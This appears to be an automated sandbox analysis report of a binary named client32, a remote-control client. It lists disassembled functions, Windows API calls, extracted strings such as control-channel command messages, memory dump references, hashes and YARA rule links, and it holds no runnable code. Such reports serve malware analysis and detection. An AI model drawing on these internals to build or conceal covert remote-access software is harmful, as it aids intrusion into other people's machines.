                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalEnterException@8LibraryLoadSectionThrowXinvalid_argument_malloc_memsetstd::_std::exception::exceptionwsprintf
                                                                                                                                                    • String ID: NSSecurity.dll$NsAppSystem Info : Control Channel Command Sent : %d$NsAppSystem Info : Control Channel Sending Command : %d
                                                                                                                                                    • API String ID: 3515807602-1044166025
                                                                                                                                                    • Opcode ID: 516f949d8a8a1383b1a24131f20d62a9ee5b2450b9431babf89fa67383d09024
                                                                                                                                                    • Instruction ID: 97a0dec6d0d64d3c3877ebf05293913b11e378911f3366e288316342895a3808
                                                                                                                                                    • Opcode Fuzzy Hash: 516f949d8a8a1383b1a24131f20d62a9ee5b2450b9431babf89fa67383d09024
                                                                                                                                                    • Instruction Fuzzy Hash: 72718FB5D00309DFEB10CFA4C844BDDFBB4AF19318F244569E915AB381DB79AA44CB91
                                                                                                                                                    Function 110717D0 Relevance: 10.7, APIs: 3, Strings: 4, Instructions: 176COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,1EF76653,76967CB0,76967AA0,?,76967CB0,76967AA0), ref: 11071824
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 11071838
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00000000,?,?), ref: 110719B1
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalSection$Leave$EnterErrorExitLastMessageProcesswsprintf
                                                                                                                                                    • String ID: ..\ctl32\Connect.cpp$Register NC_CHATEX for conn=%s, q=%p$queue$r->queue != queue
                                                                                                                                                    • API String ID: 624642848-3840833929
                                                                                                                                                    • Opcode ID: 3c83a621861238185e4c263f1509ae9a5f7840be0cd4825615d113d4d233f835
                                                                                                                                                    • Instruction ID: 4c47afc427fc1e2a273e18b082198136771a32f8cb6ee563f570ada24247464b
                                                                                                                                                    • Opcode Fuzzy Hash: 3c83a621861238185e4c263f1509ae9a5f7840be0cd4825615d113d4d233f835
                                                                                                                                                    • Instruction Fuzzy Hash: 9B611475E04285AFE701CF64C480FAABBF6FB05314F0485A9E8959B2C1E774E985CBA4
                                                                                                                                                    Function 110935A0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 110CEEB0: CreateDialogParamA.USER32(00000000,?,1112E709,110CC170,00000000), ref: 110CEF41
                                                                                                                                                      • Part of subcall function 110CEEB0: GetLastError.KERNEL32 ref: 110CF099
                                                                                                                                                      • Part of subcall function 110CEEB0: wsprintfA.USER32 ref: 110CF0C8
                                                                                                                                                      • Part of subcall function 111439A0: _memset.LIBCMT ref: 111439C9
                                                                                                                                                      • Part of subcall function 111439A0: GetVersionExA.KERNEL32(?), ref: 111439E2
                                                                                                                                                    • GetWindowLongA.USER32(?,000000EC), ref: 110935E9
                                                                                                                                                    • SetWindowLongA.USER32(?,000000EC,00000000), ref: 11093617
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 11093640
                                                                                                                                                    • SetWindowLongA.USER32(?,000000F0,00000000), ref: 1109366E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LongWindow$ErrorLastwsprintf$CreateDialogExitMessageParamProcessVersion_memset
                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                    • API String ID: 3136964118-2830328467
                                                                                                                                                    • Opcode ID: 990935dc77e2aa569bf3059a9d0286cde9b91335195f1cd60f9fd39a0179e0c2
                                                                                                                                                    • Instruction ID: a6255a4dd11f96cfd194679b8cc3cdd2b3575d4c8ce1213ed658c40333833496
                                                                                                                                                    • Opcode Fuzzy Hash: 990935dc77e2aa569bf3059a9d0286cde9b91335195f1cd60f9fd39a0179e0c2
                                                                                                                                                    • Instruction Fuzzy Hash: 1431E4B5A04615ABCB14DF65DC81F9BB3E5AB8C318F10862DF56A973D0DB34B840CB98
                                                                                                                                                    Function 110ED7B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,?), ref: 110ED801
                                                                                                                                                    • _free.LIBCMT ref: 110ED81C
                                                                                                                                                      • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                                                                                      • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                                                                                    • _malloc.LIBCMT ref: 110ED82E
                                                                                                                                                    • RegQueryValueExA.ADVAPI32(000007FF,?,00000000,?,00000000,000007FF), ref: 110ED85A
                                                                                                                                                    • _free.LIBCMT ref: 110ED8E3
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: QueryValue_free$ErrorFreeHeapLast_malloc
                                                                                                                                                    • String ID: Error %d getting %s
                                                                                                                                                    • API String ID: 582965682-2709163689
                                                                                                                                                    • Opcode ID: 59ae116487e404f5de4155705fcd48daf632d85a688279f19c106630c28adf20
                                                                                                                                                    • Instruction ID: 02eced05e3356085969bcbe05084d5abf0c2b7b1903d0388d20c61e7be7eac91
                                                                                                                                                    • Opcode Fuzzy Hash: 59ae116487e404f5de4155705fcd48daf632d85a688279f19c106630c28adf20
                                                                                                                                                    • Instruction Fuzzy Hash: F1318375D001289BDB60DA59CD84BEEB7F9EF54314F0481E9E88DA7240DE706E89CBD1
                                                                                                                                                    Function 1100F990 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 100COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 1100F9A9
                                                                                                                                                      • Part of subcall function 111612E6: std::exception::exception.LIBCMT ref: 111612FB
                                                                                                                                                      • Part of subcall function 111612E6: __CxxThrowException@8.LIBCMT ref: 11161310
                                                                                                                                                      • Part of subcall function 111612E6: std::exception::exception.LIBCMT ref: 11161321
                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 1100F9CA
                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 1100F9E5
                                                                                                                                                    • _memmove.LIBCMT ref: 1100FA4D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
                                                                                                                                                    • String ID: invalid string position$string too long
                                                                                                                                                    • API String ID: 443534600-4289949731
                                                                                                                                                    • Opcode ID: 65343fa5adcae717427247030e2bc263d0e2c2c33e6d52194a4164a92b342909
                                                                                                                                                    • Instruction ID: dd7b0a9210ae89047594a984bf0db1b74830ff0f253f3c884b4c9459fb9d7564
                                                                                                                                                    • Opcode Fuzzy Hash: 65343fa5adcae717427247030e2bc263d0e2c2c33e6d52194a4164a92b342909
                                                                                                                                                    • Instruction Fuzzy Hash: 1031FE72B04205CFE715CE5DE880A5AF7D9EF957A4B10062FE551CB240D771EC80D792
                                                                                                                                                    Function 6CA86CC0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 96libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 6CA86D0A
                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetReadFile), ref: 6CA86D72
                                                                                                                                                    • SetLastError.KERNEL32(00000078,?,6CA8B586,00000000,00000000,0000002C,?,?,00000000,0000002B,?,?), ref: 6CA86DCC
                                                                                                                                                    • SetLastError.KERNEL32(00000078,00000000,000000C8,7572E010,?,6CA8B586,00000000,00000000,0000002C,?,?,00000000,0000002B,?,?), ref: 6CA86DD6
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                                    • String ID: InternetQueryDataAvailable$InternetReadFile
                                                                                                                                                    • API String ID: 199729137-1434219782
                                                                                                                                                    • Opcode ID: 0148f4ab535913ab78e10dfc2287cb55971bbcec386e35531c17601b2af83fb5
                                                                                                                                                    • Instruction ID: 8c7a724c441de474205e6fb8102c4c1658db8fa2981080f52d6eed89c769c85f
                                                                                                                                                    • Opcode Fuzzy Hash: 0148f4ab535913ab78e10dfc2287cb55971bbcec386e35531c17601b2af83fb5
                                                                                                                                                    • Instruction Fuzzy Hash: DA318E75A012999FEB24DF58C880AE9B7B4FB49309F2085B9E989D7700D6709EC9CF50
                                                                                                                                                    Function 1103D0E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80synchronizationwindowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 111100D0: SetEvent.KERNEL32(00000000,?,1102CB9F), ref: 111100F4
                                                                                                                                                      • Part of subcall function 11110920: EnterCriticalSection.KERNEL32(00000010,00000000,757323A0,1100BF7B), ref: 11110928
                                                                                                                                                      • Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(00000010), ref: 11110935
                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00001388), ref: 1103D13A
                                                                                                                                                    • SetPriorityClass.KERNEL32(?,?), ref: 1103D167
                                                                                                                                                    • IsWindow.USER32(?), ref: 1103D17E
                                                                                                                                                    • SendMessageA.USER32(?,0000004A,000A0036,00000492), ref: 1103D1B8
                                                                                                                                                    • _free.LIBCMT ref: 1103D1BF
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalSection$ClassEnterEventLeaveMessageObjectPrioritySendSingleWaitWindow_free
                                                                                                                                                    • String ID: Show16
                                                                                                                                                    • API String ID: 625148989-2844191965
                                                                                                                                                    • Opcode ID: 3c8172704bdceca68c72fbf0a9a51fac22612fd7412045f5de257e3282e9e7b5
                                                                                                                                                    • Instruction ID: 63bdf3f47677d5a3c66ccb25ed14d3d2c42581b640399fe0720dd9fbd5d3b219
                                                                                                                                                    • Opcode Fuzzy Hash: 3c8172704bdceca68c72fbf0a9a51fac22612fd7412045f5de257e3282e9e7b5
                                                                                                                                                    • Instruction Fuzzy Hash: 3B3182B5E10346AFD715DFA4C8849AFF7F9BB84309F40496DE56A97244DB70BA00CB81
                                                                                                                                                    Function 6CA8AEA0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 79COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 6CA97D00: __vswprintf.LIBCMT ref: 6CA97D26
                                                                                                                                                      • Part of subcall function 6CA85060: _free.LIBCMT ref: 6CA8506A
                                                                                                                                                      • Part of subcall function 6CA85060: _malloc.LIBCMT ref: 6CA85090
                                                                                                                                                    • _free.LIBCMT ref: 6CA8AF0A
                                                                                                                                                      • Part of subcall function 6CAA1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 6CAA1C13
                                                                                                                                                      • Part of subcall function 6CAA1BFD: GetLastError.KERNEL32(00000000), ref: 6CAA1C25
                                                                                                                                                    • _free.LIBCMT ref: 6CA8AF39
                                                                                                                                                      • Part of subcall function 6CA97B60: _sprintf.LIBCMT ref: 6CA97B77
                                                                                                                                                      • Part of subcall function 6CA977E0: _free.LIBCMT ref: 6CA977EF
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast__vswprintf_malloc_sprintf
                                                                                                                                                    • String ID: CHANNEL=%s$CMD=STATUS$REQUESTING_HELP=%d$USERNAME=%s
                                                                                                                                                    • API String ID: 1628406020-2994292602
                                                                                                                                                    • Opcode ID: cac1ad20785ebaadda9f549909f63965d5ab83316ba2d578613734cec7fe4eee
                                                                                                                                                    • Instruction ID: 77a121a0535c796c8a2bfafeb8d8647f756719bcdc82d56935d9287caaee9ba1
                                                                                                                                                    • Opcode Fuzzy Hash: cac1ad20785ebaadda9f549909f63965d5ab83316ba2d578613734cec7fe4eee
                                                                                                                                                    • Instruction Fuzzy Hash: 2F214176A10208BBCB11DBE4CE45FFF77B89B44604F504544A602A7640EB31EA8D87F5
                                                                                                                                                    Function 11009620 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 77fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 110D1540: wvsprintfA.USER32(?,?,00000000), ref: 110D1572
                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 110096D6
                                                                                                                                                    • WriteFile.KERNEL32(?,<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >,000000B9,00000000,00000000), ref: 110096EB
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    Strings
                                                                                                                                                    • <tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >, xrefs: 110096E5
                                                                                                                                                    • <HTML%s><Body><title>Approved URLs</title><body bgcolor="#FFFFFF"><div align="center"> <center><table > <td><div align="center"> <center><table border="1" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF" bordercolor="#6089B7">, xrefs: 11009659
                                                                                                                                                    • IsA(), xrefs: 1100968D, 110096B5
                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 11009688, 110096B0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
